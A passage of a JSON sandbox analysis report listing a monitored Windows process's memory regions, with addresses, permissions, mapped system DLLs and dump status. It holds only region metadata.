"name": "pagefile_0x0000000000240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2359296, "timestamp": "00:00:47.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_852", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2424832, "timestamp": "00:00:47.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2760703, "entry_point": 0, "filename": null, "id": "region_853", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:00:47.473", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000854-addr_0x00000000011e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_123", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 18743296, "type": "region", "version": 1 }, "end_va": 19005439, "entry_point": 0, "filename": null, "id": "region_854", "name": "private_0x00000000011e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18743296, "timestamp": "00:00:47.473", "type": "region", "version": 1 }, { "dump": 
{ "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20447232, "type": "region", "version": 1 }, "end_va": 23392255, "entry_point": 20447232, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_855", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20447232, "timestamp": "00:00:47.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1945370624, "type": "region", "version": 1 }, "end_va": 1946374143, "entry_point": 1945370624, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_856", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1945370624, "timestamp": "00:00:47.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1948377087, "entry_point": 1946681344, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_857", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:00:47.474", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000005-region_00000858-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_124", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_858", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:47.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937702912, "type": "region", "version": 1 }, "end_va": 1937838079, "entry_point": 1937702912, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_859", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937702912, "timestamp": "00:00:47.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1994326016, "type": "region", "version": 1 }, "end_va": 1994608639, "entry_point": 1994326016, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_860", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1994326016, "timestamp": "00:00:47.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the 
configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 18612224, "type": "region", "version": 1 }, "end_va": 18616319, "entry_point": 0, "filename": null, "id": "region_861", "name": "pagefile_0x00000000011c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18612224, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 19005440, "type": "region", "version": 1 }, "end_va": 19156991, "entry_point": 19005440, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db", "id": "region_862", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db", "region_type": "memory_mapped_file", "start_va": 19005440, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 23396352, "type": "region", "version": 1 }, "end_va": 27537407, "entry_point": 0, "filename": null, "id": "region_863", "name": "pagefile_0x0000000001650000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 23396352, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 73728, "start_va": 1965293568, "type": "region", "version": 1 }, "end_va": 1965367295, "entry_point": 1965293568, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_864", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1965293568, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1966538752, "type": "region", "version": 1 }, "end_va": 1966698495, "entry_point": 1966538752, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_865", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1966538752, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1990905855, "entry_point": 1989214208, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_866", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:00:47.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1898053632, "type": "region", "version": 1 }, "end_va": 1898364927, "entry_point": 1898053632, "filename": "\\Windows\\System32\\apphelp.dll", "id": 
"region_867", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1898053632, "timestamp": "00:00:47.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1860698112, "type": "region", "version": 1 }, "end_va": 1860886527, "entry_point": 1860698112, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_868", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1860698112, "timestamp": "00:00:47.534", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000869-addr_0x0000000001250000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_125", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 19202048, "type": "region", "version": 1 }, "end_va": 19464191, "entry_point": 0, "filename": null, "id": "region_869", "name": "private_0x0000000001250000", "norm_filename": null, "region_type": "private_memory", "start_va": 19202048, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000870-addr_0x0000000001a50000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_126", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 27590656, "type": "region", "version": 1 }, "end_va": 28639231, "entry_point": 0, "filename": null, "id": "region_870", "name": 
"private_0x0000000001a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 27590656, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000871-addr_0x0000000001be0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_127", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 29229056, "type": "region", "version": 1 }, "end_va": 29491199, "entry_point": 0, "filename": null, "id": "region_871", "name": "private_0x0000000001be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29229056, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1860632576, "type": "region", "version": 1 }, "end_va": 1860669439, "entry_point": 1860632576, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_872", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1860632576, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000873-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_128", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_873", "name": "private_0x000000007ffdc000", "norm_filename": 
null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:47.598", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000874-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_874", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:47.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2834431, "entry_point": 2818048, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_875", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2818048, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 18677760, "type": "region", "version": 1 }, "end_va": 18694143, "entry_point": 18677760, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_876", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 18677760, 
"timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 19464192, "type": "region", "version": 1 }, "end_va": 19660799, "entry_point": 19464192, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_877", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 19464192, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 28639232, "type": "region", "version": 1 }, "end_va": 29057023, "entry_point": 28639232, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_878", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 28639232, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1877016576, "type": "region", "version": 1 }, "end_va": 1877475327, "entry_point": 1877016576, "filename": "\\Windows\\System32\\ntshrui.dll", 
"id": "region_879", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1877016576, "timestamp": "00:00:47.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1962147840, "type": "region", "version": 1 }, "end_va": 1962250239, "entry_point": 1962147840, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_880", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1962147840, "timestamp": "00:00:47.619", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000881-addr_0x0000000001da0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31326207, "entry_point": 0, "filename": null, "id": "region_881", "name": "private_0x0000000001da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31064064, "timestamp": "00:00:47.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1877475328, "type": "region", "version": 1 }, "end_va": 1877520383, "entry_point": 1877475328, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_882", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", 
"start_va": 1877475328, "timestamp": "00:00:47.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000883-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_883", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:47.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1933967360, "type": "region", "version": 1 }, "end_va": 1934008319, "entry_point": 1933967360, "filename": "\\Windows\\System32\\slc.dll", "id": "region_884", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1933967360, "timestamp": "00:00:47.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_885", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:47.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 
"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_886", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:47.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1673920512, "type": "region", "version": 1 }, "end_va": 1674420223, "entry_point": 1673920512, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_887", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1673920512, "timestamp": "00:00:47.656", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 19660800, "type": "region", "version": 1 }, "end_va": 19664895, "entry_point": 0, "filename": null, "id": "region_888", "name": "pagefile_0x00000000012c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19660800, "timestamp": "00:00:47.844", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000889-addr_0x0000000001c80000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_889", "name": "private_0x0000000001c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 29884416, "timestamp": "00:00:47.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1662386176, "type": "region", "version": 1 }, "end_va": 1668329471, "entry_point": 1662386176, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_890", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1662386176, "timestamp": "00:00:47.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1854799872, "type": "region", "version": 1 }, "end_va": 1855434751, "entry_point": 1854799872, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_891", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1854799872, "timestamp": "00:00:47.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile 
backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19726336, "type": "region", "version": 1 }, "end_va": 19730431, "entry_point": 0, "filename": null, "id": "region_892", "name": "pagefile_0x00000000012d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19726336, "timestamp": "00:00:48.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 19791872, "type": "region", "version": 1 }, "end_va": 19795967, "entry_point": 0, "filename": null, "id": "region_893", "name": "pagefile_0x00000000012e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19791872, "timestamp": "00:00:48.331", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000894-addr_0x00000000012f0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 19857408, "type": "region", "version": 1 }, "end_va": 19922943, "entry_point": 0, "filename": null, "id": "region_894", "name": "private_0x00000000012f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 19857408, "timestamp": "00:00:48.331", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000895-addr_0x0000000001300000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", 
"version": 1 }, "size": 65536, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 19988479, "entry_point": 0, "filename": null, "id": "region_895", "name": "private_0x0000000001300000", "norm_filename": null, "region_type": "private_memory", "start_va": 19922944, "timestamp": "00:00:48.331", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000896-addr_0x0000000001350000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20250624, "type": "region", "version": 1 }, "end_va": 20316159, "entry_point": 0, "filename": null, "id": "region_896", "name": "private_0x0000000001350000", "norm_filename": null, "region_type": "private_memory", "start_va": 20250624, "timestamp": "00:00:48.332", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000897-addr_0x0000000001360000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20316160, "type": "region", "version": 1 }, "end_va": 20381695, "entry_point": 0, "filename": null, "id": "region_897", "name": "private_0x0000000001360000", "norm_filename": null, "region_type": "private_memory", "start_va": 20316160, "timestamp": "00:00:48.332", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000898-addr_0x0000000001bc0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, 
"start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29163519, "entry_point": 0, "filename": null, "id": "region_898", "name": "private_0x0000000001bc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29097984, "timestamp": "00:00:48.333", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000899-addr_0x0000000001bd0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 29229055, "entry_point": 0, "filename": null, "id": "region_899", "name": "private_0x0000000001bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29163520, "timestamp": "00:00:48.333", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000900-addr_0x0000000001cc0000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_900", "name": "private_0x0000000001cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30146560, "timestamp": "00:00:48.333", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000901-addr_0x0000000001d80000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 
65536, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 30998527, "entry_point": 0, "filename": null, "id": "region_901", "name": "private_0x0000000001d80000", "norm_filename": null, "region_type": "private_memory", "start_va": 30932992, "timestamp": "00:00:48.334", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000902-addr_0x0000000001ee0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 32636927, "entry_point": 0, "filename": null, "id": "region_902", "name": "private_0x0000000001ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32374784, "timestamp": "00:00:48.334", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 32636928, "type": "region", "version": 1 }, "end_va": 66191359, "entry_point": 0, "filename": null, "id": "region_903", "name": "private_0x0000000001f20000", "norm_filename": null, "region_type": "private_memory", "start_va": 32636928, "timestamp": "00:00:48.335", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000904-addr_0x0000000003fc0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": 